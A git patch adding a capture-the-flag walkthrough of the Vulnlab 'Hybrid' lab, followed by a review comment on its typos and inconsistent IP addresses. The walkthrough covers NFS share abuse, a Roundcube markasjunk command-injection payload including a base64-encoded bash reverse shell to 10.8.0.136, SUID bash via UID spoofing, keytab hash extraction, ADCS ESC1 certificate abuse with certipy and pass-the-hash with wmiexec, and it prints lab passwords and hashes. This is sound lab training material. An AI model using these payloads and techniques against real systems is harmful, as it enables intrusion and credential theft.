From 1fc8422ab0de674d9834904490cc80783135c448 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Wed, 12 Jul 2023 22:25:38 +0300
Subject: [PATCH] Create Hybrid.md
---
Vulnlab/Hybrid.md | 342 ++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 342 insertions(+)
create mode 100644 Vulnlab/Hybrid.md
diff --git a/Vulnlab/Hybrid.md b/Vulnlab/Hybrid.md
new file mode 100644
index 0000000..07889d6
--- /dev/null
+++ b/Vulnlab/Hybrid.md
@@ -0,0 +1,342 @@
+
+# Vulnlab - Hybrid
+
+# dc01
+
+## NMAP
+
+```bash
+Nmap scan report for 10.10.177.197
+Host is up (1.1s latency).
+Not shown: 65523 filtered tcp ports (no-response)
+PORT STATE SERVICE VERSION
+53/tcp open tcpwrapped
+135/tcp open tcpwrapped
+139/tcp open tcpwrapped
+445/tcp open tcpwrapped
+464/tcp open tcpwrapped
+3268/tcp open tcpwrapped
+3389/tcp open tcpwrapped
+|_ssl-date: 2023-07-09T15:21:51+00:00; -3s from scanner time.
+| ssl-cert: Subject: commonName=dc01.hybrid.vl
+| Issuer: commonName=dc01.hybrid.vl
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-06-17T08:29:18
+| Not valid after: 2023-12-17T08:29:18
+| MD5: 503e6a310914a23a96f899c161496768
+|_SHA-1: 8b350872418cb813302ad430acb1b1497acada2e
+49669/tcp open tcpwrapped
+51915/tcp open tcpwrapped
+51928/tcp open tcpwrapped
+53128/tcp open tcpwrapped
+57220/tcp open tcpwrapped
+Host script results:
+|_clock-skew: mean: -3s, deviation: 0s, median: -3s
+| smb2-time:
+| date: 2023-07-09T15:21:28
+|_ start_date: N/A
+| smb2-security-mode:
+| 311:
+|_ Message signing enabled and required
+
+```
+
+## PORT 445 (SMB)
+
+From dc01, we only see smb service running which we can try enumerating with anonymous login which didn't worked
+
+
+
+# mail01
+
+## NMAP
+
+```bash
+Nmap scan report for 10.10.177.198
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 256 60bc2226783cb4e06beaaa1ec1625dde (ECDSA)
+|_ 256 a3b5d86106e63a418845e35203d2231b (ED25519)
+25/tcp open smtp Postfix smtpd
+|_smtp-commands: Couldn't establish connection on port 25
+80/tcp open http nginx 1.18.0 (Ubuntu)
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+110/tcp open pop3 Dovecot pop3d
+111/tcp open rpcbind
+143/tcp open imap Dovecot imapd (Ubuntu)
+587/tcp open smtp Postfix smtpd
+|_smtp-commands: Couldn't establish connection on port 587
+993/tcp open ssl/imap Dovecot imapd (Ubuntu)
+| ssl-cert: Subject: commonName=mail01
+| Subject Alternative Name: DNS:mail01
+| Issuer: commonName=mail01
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-06-17T13:20:17
+| Not valid after: 2033-06-14T13:20:17
+| MD5: 38372b812fb16f03436025b4d26bdb29
+|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008
+995/tcp open ssl/pop3 Dovecot pop3d
+| ssl-cert: Subject: commonName=mail01
+| Subject Alternative Name: DNS:mail01
+| Issuer: commonName=mail01
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-06-17T13:20:17
+| Not valid after: 2033-06-14T13:20:17
+| MD5: 38372b812fb16f03436025b4d26bdb29
+|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008
+2049/tcp open rpcbind
+33893/tcp open rpcbind
+37693/tcp open rpcbind
+42661/tcp open rpcbind
+46025/tcp open rpcbind
+47609/tcp open rpcbind
+```
+
+## PORT 80 (HTTP)
+
+mail01 had web server running on port 80 which redirects to `mail01.hybrid.vl`
+
+
+
+Adding the domain in `/etc/hosts` file
+
+
+
+
+
+This brings us to `Roudcube webmail` login portal, trying default credentials like `admin:admin` it didn't worked
+
+
+
+## PORT 2049 (NFS)
+
+mail01 had nfs running on port 2049, we can list the share available to mount
+
+```bash
+showmount -e 10.10.177.198
+```
+
+
+
+We can mount this share with the following command
+
+```bash
+ mount -t nfs 10.10.177.198:/opt/share /home/arz/VulnLab/Hybrid/share
+```
+
+
+
+From this directory we can find `backup.tar.gz`
+
+
+
+Extracting the archive
+
+
+
+From the `opt` folder we can find a certificate
+
+
+
+And from `/etc/dovecot` we can find the credentials for roundcube mail
+
+
+
+Logging in as `peter.turner` we can see an email sent from admin talking about spam filter
+
+
+
+https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/
+
+## Foothold
+
+Following an article for remote code execution on markasjunk plugin we can execute commands by changing the email address of a user by using `${IFS}` which is a variable in bash that represents a space, tab and a new line character
+
+```
+admin&curl${IFS}10.8.0.136&@hybrid.vl
+```
+
+
+
+Now mark any email as junk
+
+
+
+We'll get a callback on our listener, so the commands are getting executed
+
+
+
+We can get a reverse shell by base64 encoding the payload
+
+```bash
+bash -i >& /dev/tcp/10.8.0.136/2222 0>&1
+
+admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMTM2LzIyMjIgMD4mMQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl
+```
+
+
+
+On doing the same procedure, we'll get a reverse shell as `www-data`
+
+
+
+In `/home` we only see one user which is a domain user, `peter.turner`, I tried switching to peter by using his roudcube password but it didn't worked
+
+
+
+I tried cracking the password of `privkey.pem` but it took a long time so I decided to give up on that
+
+
+
+Reading `/etc/exports` file, we can see there's no `no_root_squash` so we cannot place bash binary owned by root user
+
+
+
+We know there's peter.turner on the victim machine with the id `902601108`
+
+
+
+Before creating the user with the same uid on our machine we meed to allow the creation of uids above 60000 range
+
+
+
+Edit the `/etc/logins.defs` and change the `UID_MAX` value
+
+
+
+
+
+Now copying bash binary in the mounted folder
+
+
+
+We can see that this binary is owned by peter.turner since we used the same UID and it's a SUID, but on executing it wasn't being executed due to a different GLIBC version, so instead transferring the bash binary from the victim machine and making it a SUID
+
+
+
+
+
+From peter's home directory, we can find `passwords.kdbx` file which is a keepassp password safe file
+
+
+
+
+Reading the kdbx file with `kpcli` , it asks for a password
+
+
+
+Using peter's roudcube password it worked on this file
+
+
+
+From `hybrid.vl` entry we can get the password of peter
+
+
+We can use this password to check privileges of peter, which can run anything as root
+
+
+
+
+
+Being root user we can access `/etc/k`
+
+Running `python-bloodhound` to enumerate the trusted.vl domain
+
+```bash
+python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.132.229
+```
+
+
+
+From bloodhound, there wasn't any path from peter leading to domain admin
+
+
+
+Enumerating ADCS with `certipy` for vulnerable certificates
+
+```bash
+certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.228.165
+```
+
+
+
+Members of `Authenticated users` can enroll and authenticate any user with `hybrid-DC01-CA` (ESC-1), using `old-bloodhound` to get the result in json file so we can view it in bloodhound
+
+```bash
+certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.147.37 -old-bloodhound
+```
+
+
+
+https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json
+
+ Make sure to add custom queries for ADCS in `~./config/bloodhound/customqueries.json` to analyze ADCS in the domain
+
+
+
+After putting the custom queries we can see the templates being reflected on bloodhound
+
+
+
+Marking `hybrid-DC01-CA` as the high value target and checking the shortest path to hybrid-DC01-CA
+
+
+
+So now we need MAIL01's hash, going back to linux machine as root user, we can extract the NTHash using https://github.com/sosdave/KeyTabExtract from `/etc/krb5.keytab`
+
+
+
+
+
+From certipy we didn't found any template names, from bloodhound we can see two templates from which using `HYBRIDCOMPUTERS`
+
+
+
+On requesting the certificate, it was giving an error related to public key requirement
+
+
+
+Checking the pem file we have, we can see the size of the public key, which is 4096 bit
+
+
+
+Specifying the size of the public key file and requesting the certificate to authenticate as administrator
+
+```bash
+certipy req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.228.165" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096
+```
+
+
+
+Now again with `certipy` we can request administrator's NTHash
+
+```bash
+certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.228.165
+```
+
+
+
+We can get a shell through `wmiexec`
+
+```bash
+wmiexec.py administrator@10.10.228.165 -hashes ':60701e8543c9f6db1a2af3217386d3dc'
+```
+
+
+
+
+## References
+
+- https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/
+- https://github.com/ly4k/Certipy/blob/main/customqueries.json
+- https://github.com/sosdave/KeyTabExtract
+- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
+- https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration
+
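Review bot: the walkthrough text has several inconsistencies and unfinished lines that should be fixed before merging: the domain controller address changes without explanation between the NMAP block (10.10.177.197), the bloodhound.py call (10.10.132.229), the `-old-bloodhound` call (10.10.147.37) and the certipy/wmiexec calls (10.10.228.165), so a one-line note that the lab IP changed between sessions would help; the sentence "Running `python-bloodhound` to enumerate the trusted.vl domain" names a domain that appears nowhere else while the command targets `hybrid.vl`; the line "Being root user we can access `/etc/k`" is cut off and should be completed or removed; `/etc/logins.defs` should read `/etc/login.defs` and `~./config/bloodhound/customqueries.json` should read `~/.config/bloodhound/customqueries.json`. The long runs of empty `+` lines look like places where screenshots were meant to be embedded but no image files are part of this commit, so either add the image references or drop the blank lines. Spelling and grammar: "Roudcube" (three times) for Roundcube, "meed" for need, "didn't worked" / "didn't found" for didn't work / didn't find, "keepassp" for KeePass. Finally, the text states the ESC1 condition only indirectly ("Members of `Authenticated users` can enroll and authenticate any user with `hybrid-DC01-CA`"); it would be clearer to say explicitly that the `HYBRIDCOMPUTERS` template allows the requester to supply an arbitrary UPN, which is why the `-upn 'administrator'` request succeeds, and that the NFS export of `backup.tar.gz` (containing the Dovecot credentials and `privkey.pem`) is the initial exposure the rest of the chain builds on.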